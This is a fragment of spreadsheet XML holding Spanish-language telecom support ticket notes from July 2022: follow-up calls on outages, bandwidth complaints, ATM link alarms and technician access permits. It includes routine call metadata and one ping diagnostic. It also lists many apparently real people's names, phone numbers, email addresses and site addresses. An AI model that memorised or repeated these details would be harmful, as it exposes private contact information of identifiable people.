  <si>
    <t>SE LLAMA A CLIENTE LUIS GALVEZ 22804000 OPC 1 RESPONDEN Y TRATAN DE TRANSFERIR LA LLAMADA AL AREA CORRESPONDIENTE PERO CORTAN LA LLAMADA
-ID 3001834441</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALVEZ AL 22804000 OPC 1 || CL AUN NO RESPONDE CORREO || SE LLAMA NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001821615
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GALVEZ 22804000 OPC 1 MENCIONA QUE EL SEGUIMIENTO LO ESTARA DANDO CON SU EJECUTIVO POR EL TEMA DE ANCHO DE BANDA
-ID 3001954967</t>
  </si>
  <si>
    <t>F4627988</t>
  </si>
  <si>
    <t>F4627990</t>
  </si>
  <si>
    <t>F4628003</t>
  </si>
  <si>
    <t>F4628014</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JONNY AREOLA 55796906 MENCIONA QUE EL INCONVENIENTE ES NO PODER LLEGAR AL ANCHO DE BANDA CONTRATADO
CLIENTE MENCIONA QUE LAS PRUEBAS LAS REALIZAN CON UN TELEFONO, NO CUENTAN CON UNA PC PARA PODER REALIZAR LAS PRUEBAS
SE LE SOLICITA A CLIENTE SI PODRIA LOCALIZAR UNA PC Y MENCIONA QUE NO PUEDE CONSEGUIRLA
-ID 3001799050
NOMBRE DEL CLIENTE: COLEGIO BILINGUE AMERICANO
UBICACIÓN: KM 1.2 CARRETERA A SAN FRANCISCO ZAPOTITLAN SUCHITEPEQUEZ MAZATENANGO
CONTACTO EN SITIO: ESVIN ARNOLDO - 54963029
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS Y NOTIFICARA A QUE HORA LLEGARAN
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4628016</t>
  </si>
  <si>
    <t>F4628018</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESVIN ARNOLDO COMENTA QUE LE DIERON INSTRUCCIONES PARA VERIFICAR EL SERVICIO EL DIA DE HOY, POR LO QUE SE ESTARA COORDINANDO CON SUPERVISORES DEL AREA
3001804662
COLA:
NOMBRE: A: 54963029
NÚMERO: 54963029
DURACIÓN: 0:01:48
ESTADO: CONECTADA
DETALLES: 54963029
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/07/2022 18:35:24</t>
  </si>
  <si>
    <t>F4628040</t>
  </si>
  <si>
    <t>SE LLAMA A JULIO QUIEN INDICA QUE EN EL SECTOR TIENEN PROBLEMAS DE ENERGÍA, INDICA QUE LOS EQUIPOS SE ENCUENTRAN FUNCIONANDO CORRECTAMENTE POR UPS Y QUE SE LE DIO MANTENIMIENTO A PRINCIPIOS DE AÑO
1001115125
COLA:
NOMBRE: A: 59631025
NÚMERO: 59631025
DURACIÓN: 0:02:54
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 59631025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 6/07/2022 12:07:01</t>
  </si>
  <si>
    <t>SE LLAMA A JULIO 59631025 (PUNTO REMOTO) , PARA VALIDAR SI APAGA EQUIPO CUANDO SE RETIRA DEL LUGAR, YA QUE ACTUALMENTE ESTA OPERATIVO PERO SERVICIO CAE AL FINALIZAR LA TARDE Y SE ENCUENTRA OPERATIVO NUEVAMENTE AL DIA SIGUIENTE CON REGISTRO DE REINICIO POR ENERGIA EN EL CPE. NO SE TIENE RESPUESTA A LA LLAMADA.
ID
3001965379
COLA:
NOMBRE: A: 59631025
NÚMERO: 59631025
DURACIÓN: 0:01:07
ESTADO: CONECTADA
DETALLES: 59631025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 15:25:47</t>
  </si>
  <si>
    <t>SE NOTIFICA A ARLMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ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628040
ID:  61200234T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_3G_ZONA_9
UBICADO EN:  50259780748_1A CALLE 7-66 ZONA 9GUATEMALA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628047</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO NO RESPONDE EN ESPERA MAS DE 4 MIN || SE INTENTARA LUEGO **
-ID 3001822365- 3001822554
**</t>
  </si>
  <si>
    <t>F4628118</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8118
ID: 7300286T
IDENTIFICADOR DEL CLIENTE: CC_BAM_GT_INTERNET_ZONA_PRADERA
UBICADO EN: INTERNET.- 18 C. 24-69 Z.10 ZONA PRADERA TR.5 NIV.1
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628125</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 4 DE JULIO DE 2022 20:35PARA: MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM38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8125
ID: 47502094T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM3852
UBICADO EN:  CAJERO 3852 FARMACIA CRUZ VERDE, 16 AV. 4-16 ZONA 1 ZACAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628126</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CONTINUA CAIDO, NO HAY TT REACTIVO, SE VALIDA CON PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA
NODE STATUS 	UNREACHABLE
SYSTEM NAME 	CC_AZTECA_GT_SUC001141
IP ADDRESS 	10.212.118.217
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_AZTECA_VIP
CUSTOMER 	OPMANTEK
LOCATION 	ZACAPA
BUSINESS SERVICE 	
SERVICE STATUS 	PRODUCTION
TYPE 	ROUTER
MODEL 	CISCOROUTER
UPTIME 	13 DAYS, 8:51:06
LOCATION 	06 AVENIDA 04-16 ZONA 01 EDIFICIO LEE CENTER ZACAPA</t>
  </si>
  <si>
    <t>F4628181</t>
  </si>
  <si>
    <t>***---  CL AUTORIZA CIERRE DE SD ---***
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: MARTES, 5 DE JULIO DE 2022 04:50
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 944498 ::: TICKET CNOC IMCRL004830 ::: "CORTES"
ESTIMADOS,
NO SE OBTUVO RESPUESTA DEL CLIENTE, PROCEDEMOS AL CIERRE. GRACIAS.
BEST REGARDS | SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4628184</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 5 DE JULIO DE 2022 16:31
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DE CAJERO: CC_TYT_GT_ATM67
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM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8184
ID: 806300191T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM67
UBICADO EN: BANCO DEL AGRO CALLE PRINCIPAL COME - ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628197</t>
  </si>
  <si>
    <t>SE HABLÓ CON JULIO GONZÁLEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, PERO NO HAN TENIDO LA VALIDACIÓN DE SU CLIENTE FINAL, PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA DAR POR CERRADO EL TICKET.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 963463 ::: TICKET CNOC IMPUS010891 ::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001892273 - 3001892979</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 52 55 5174 5290 CONTESTA EL SEÑOR RODRIGO QUIEN INDICA QUE AUN ESTA A ESPERA DE RESPUESTA DE CLIENTE SOLICITA SE MANTENGA ABIERTO EL TICKET HASTA CUANDO CL RESPONDA NOS ESTARAN COMENTANDO  **
-ID 3001910903
**</t>
  </si>
  <si>
    <t>F4628299</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO VILLATORO AL 5414-1459 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001823491
**</t>
  </si>
  <si>
    <t>F4628331</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE LUIS LOPEZ AL 51316120 INDICA QUE AUN SIGUE SIN SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001828468
**</t>
  </si>
  <si>
    <t>F4628340</t>
  </si>
  <si>
    <t>###EN CONFERENCIA CON CLIENTE Y TECNICO SE PROCEDE A VALIDAR QUE SE LE DE 20 MINUTOS###
LLAMAR AL TECNICO PARA QUE SE RETIRE CUANDO EL CLIENTE VALIDE
1001094018
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:01:34
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 6/07/2022 11:06:20</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON ESCOBAR AL  59496106 SOLICITA QUE SE LE LLAME NUEVAMENTE YA QUE NO HA VERIFICADO **
-ID 3001833097
**</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE ESTARA RESPONDIENDO POR CORREO CUANDO ESTEN AUTORIZADOS LOS PERMISOS
-ID 3001875807</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 10:49
PARA: SOPORTE@HELADOSARITA.COM &lt;SOPORTE@HELADOSARITA.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || DISAR S.A. || 249600056T || F4628340
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
BAGNER MERIDA    -   2319 64617 130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BYRON ESCOBAR 59496106 MENCIONA QUE ES NECESARIO TRAMITAR LOS PERMISOS PARA PERSONAL TECNICO
-ID 3001875807</t>
  </si>
  <si>
    <t>F4628348</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE SALVADOR CHIAPAS 23743000 EXT 10616 CONTESTA EL SEÑOR OSCAR MOXU INDICA QUE POR EL MOMENTO YA ESTA ESTABLE Y OPERATIVO EL SERVICIO || SOLICITA QUE SE LE ENVIE EL INFORME DE LA CAIDA DEL SERVICIO || SE NOTIFICA A GESTOR **
-ID 3001841733
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE SALVADOR CHIAPAS 23743000 EXT 10616 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001832541</t>
  </si>
  <si>
    <t>F4628349</t>
  </si>
  <si>
    <t>F4628359</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDGAR CASTRO 72681515 MENCIONA QUE AL LLEGAR A PR LOS EQUIPOS ESTABAN APAGADOS, CLIENTE APLICO REINICIO Y ACTUALMENTE TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 3001843615
&lt;PZACSVYQN1D1EID1&gt;PING -C 1000 -S 1000 -M 15 -BRIEF -VPN-INSTANCE ARROCERA 10.152.237.18
  PING 10.152.237.18: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.152.237.18 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/10 MS
&lt;PZACSVYQN1D1EID1&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR CASTRO 72681515 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA A LAS  9:00 HRS
-ID 3001831128</t>
  </si>
  <si>
    <t>F4628374</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE BRUNO GONZALEZ-48050693    EN LINEA ###
3001832350
COLA:
NOMBRE: A: 48050693
NÚMERO: 48050693
DURACIÓN: 0:01:00
ESTADO: CONECTADA
DETALLES: 48050693
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 08:31:41</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS EN LLAMADAS Y VALIDA SERVICIO ###</t>
  </si>
  <si>
    <t>F4628379</t>
  </si>
  <si>
    <t>SE LLAMA A ADRIANA PARA VALIDAR EL SERVICIO SIN EMBARGO NO RESPONDE-
78608595</t>
  </si>
  <si>
    <t>SE LLAMA ADRIANA PARA VALIDAR SERVICIO SIN EMBARGO ENVIA A BUZON--
78608595</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADRIANA LOPEZ AL 78608595 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001864561
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADRIANA AL 78608595 NO RESPONDE ENVIA A BUZON DE VOZ || SE INTENTARA LUEGO**
-ID 3001844975
**</t>
  </si>
  <si>
    <t>F4628412</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANDRA VICTORIA FUENTES BOBADILLA 58261426 MENCIONA QUE AUN ESTAN ESPERANTO QUE GENEREN LA OT PERO YA CUENTA CON LA PREVENTA 5508549
-ID 3001949363</t>
  </si>
  <si>
    <t>F4628415</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL DIAZ 72742051 MENCIONA QUE NO HA PODIDO VALIDAR POR LO QUE SOLICITA LLAMADA EN 1 HORA
-ID 3001865547</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL DIAZ 72742051 MENCIONA QUE PRESENTAN PROBLEMA DE LENTITUD, SE LE BRINDA EL DIAGNOSTICO DEL SERVICIO
CLIENTE INDICA QUE VALIDARAN CON SU IT POR LO QUE SOLICITA LLAMADA EN 1 HORA
-ID 3001836359</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SAUL DIAZ 72742051  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001889429</t>
  </si>
  <si>
    <t>F4628417</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FABIAN CRUZ 31602051 MENCIONA NUMERO EQUIVOCADO QUE ES PERSONAL DE HN
-ID 3001953190</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIAN CRUZ AL 3212-1904 CONTESTA EL SEÑOR ALEJANDRO E INDICA QUE LES URGE LA VISITA TECNICA  QUE SE LE ENVIE AL PERSONAL Y EL AHORITA ESTARA SOLICITANDO EL PERMISO PARA QUE LOS DEJEN INGRESAR | SE NOTIFICA A GESTOR **
-ID 3001936677
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIAN CRUZ AL 31602051 NO RESPONDE || ENVIA A BUZON | SE INTENTARA LUEGO**
-ID 3001915289
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIAN CRUZ AL 31602051 INDICA QUE ES NUMERO EQUIVOCADO QUE NO ES EL CLIENTE QUE EL ES DE CLARO TAMBIEN**
-ID 3001935248 - 3001935408
**</t>
  </si>
  <si>
    <t>F4628425</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARCENIO GARCIA 33534064 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001947454</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE MARIO SALGADO  AL 33534064  INDICA QUE NO SE ENCUENTRA EN SITIO PERO QUE DESEA QUE SE REVISE EL MOTIVO POR EL CUAL TUVO CAIDAS DE UN MINUTO O 2 MIN EL DIA DE AYER YA QUE TODO EL DIA PASO ASI Y HOY NO HA VERIFICADO YA QUE LLEGA A OFICINA A LAS 14.00 O 15:00 HRS SOLICITA QUE SE LE LLAME A ESA HORA PARA EL SEGUIMIENTO **
-ID 3001849707
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ARCENIO GARCIA AL 3140-0667 Y BRINDA EL NUMERO DEL SEÑOR MARIO SALGADO 33534064 PARA CONFIRMAR **
-ID 3001849058
**</t>
  </si>
  <si>
    <t>F4628426</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE DIEGO HERNANDEZ 57352558 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001912795</t>
  </si>
  <si>
    <t>F4628428</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANDREA MONTENEGRO 42147113 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001947899</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA MONTENEGRO 42147113 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001927204</t>
  </si>
  <si>
    <t>F4628437</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUSTAVO GARCIA 31074226 MENCIONA QUE EL NO TIENE INFORMACION Y CON EL NO SE DEBE DAR SEGUIMIENTO PORQUE NO VE LOS SERVICIOS CORPORATIVOS
-ID 3001861106</t>
  </si>
  <si>
    <t>F4628443</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ERICK PARA REALIZAR PRUEBAS Y VALIDAR TEMAS DE ENERGIA SIN EMBARGO NO RESPONDE-
58064113</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ERICK MONTEJO - 58064113 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001859845</t>
  </si>
  <si>
    <t>F4628451</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE ACTUALMENTE YA ETA FUNCIONANDO CORRECTAMENTE PERO SOLICITA SE PUEDA VALIDAR SI NO SE PRESENTO ALGUNA CAIDA O COMPARTIR LAS GRAFICAS
-ID 3001851716</t>
  </si>
  <si>
    <t>F4628452</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ELMER CARDONA 40422160 MENCIONA QUE NO CUENTAN CON ENERGIA ELECTRICA EN PR
-ID 3001850612</t>
  </si>
  <si>
    <t>F4628456</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL CLIENTE, NOS APOYA CON REALIZAR PRUEBAS DE PRIMER NIVEL PERO NO SE LORA RESTABLECER EL SERVICIO POR LO QUE SE  PIDEN DATOS PARA ENVIAR TECNICO.
1001109803
COLA:
NOMBRE: A: 41642051
NÚMERO: 41642051
DURACIÓN: 0:16:31
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 41642051
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 6/07/2022 12:05:58
1001109297
COLA:
NOMBRE: A: 41642051
NÚMERO: 41642051
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 41642051
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 6/07/2022 11:48:56</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA RESPONDE KIMBERLY Y ME PROPORCIONA EL NUMERO DE CELULAR PARA PODER HACER PRUEBAS.: 41642051
1001104916
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:02:56
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 6/07/2022 11:39:02</t>
  </si>
  <si>
    <t>F4628457</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESCARLET MANZANERO 41753805 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001863289 - 3001863485</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESCARLET MANZANERO 41753805 NO REPSONDE, SE INTENTARA LUEGO
-ID 3001874304</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESCARLET MANZANERO 41753805 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 3001849442</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ESCARLET MANZANERO 41753805 NO RESPONDE, SE INTNTARA LUEGO
-ID 3001855783</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41753805  NO RESPONDE, ENVIA A BUZON
-ID 3001866556</t>
  </si>
  <si>
    <t>F4628461</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL PAIZ AL 78028910 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001889753
**</t>
  </si>
  <si>
    <t>F4628462</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN LOPEZ 52145131 PARA BRINDAR RETROALIMENTACION
-ID 3001867300</t>
  </si>
  <si>
    <t>F4628465</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR SELVIN 49872286 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001868284</t>
  </si>
  <si>
    <t>F4628468</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE COMPARTA OTRO CONTACTO EL ACTUAL NO RESPONDE-
RE: G314 - ENLACE CLARO - CON ID 770600178T</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE AL ENCARGADO SIN EMBARGO NO RESPONDE-
77924956</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001875465</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 77924956 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001874798</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PERO NO RESPONDE
RESULTADO: LLAMADA HECHA
NOMBRE: 77924956
NÚMERO: 77924956
INICIO: HOY, 13:51
FIN: HOY, 13:52
DURACIÓN: 0:47
ID DE LLAMADA: 3001937749</t>
  </si>
  <si>
    <t>**SE LLAMA AL CONTACTO ADICIONAL EN PDV  JORGE MORATAYA 53210629 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001916691
**</t>
  </si>
  <si>
    <t>SE LLAMA AL ENCARGADO DE TIENDA PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE--
77924956</t>
  </si>
  <si>
    <t>F4628477</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE SR. SALGADO AL 32675009 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE CADA 10 MIN SE LE HABIA ESTADO CAENDO EL SERVICIO SOLICITA QUE SE LE LLAME A LAS 15:00 HRS NUEVAMENE PARA CONFIRMAR COMO LE HA FUNCIONADO **
-ID 3001853712
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR. SALGADO 32675009 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001968111</t>
  </si>
  <si>
    <t>F4628478</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A NERY ORTIZ 47689694 APOYA UBICANDO AETHRA 6044 PROCEDE A REINICIARLO</t>
  </si>
  <si>
    <t>CLIENTE NERY ORTIZ 47689694  REALIZA LLAMADAS DE PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 47689694
NÚMERO: 47689694
INICIO: HOY, 09:46 A. M.
FIN: HOY, 10:03 A. M.
DURACIÓN: 17:26
ID DE LLAMADA: 3001855494</t>
  </si>
  <si>
    <t>F4628482</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK ESCOTO AL  99924532 SE BRINDA RETROALIMENTACION **
-ID 3001888604
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK ESCOTO AL 99924532 Y BRINDA LOS SIGUIENTES DATOS SOLO DIRECCION NO BRINDA Y CORTA LLAMADA SE INTENTO LLAMAR NUEVAMENTE PERO NO CONTESTO **
HORARIO DE ATENCION: LAS  24 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCCION: CL NO BRINDA DIRECCION
ATENDERA EN SITIO: ERICK ESCOTO
-ID 3001861650 - 3001862173
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK ESCOTO AL 99924532 INDICA QUE NO SE ENCUENTRA EN OFICINA AHORITA QUE SE LE LLAME A LAS 17:00 HRS **
-ID 3001932259 - 3001932720
**</t>
  </si>
  <si>
    <t>F4628486</t>
  </si>
  <si>
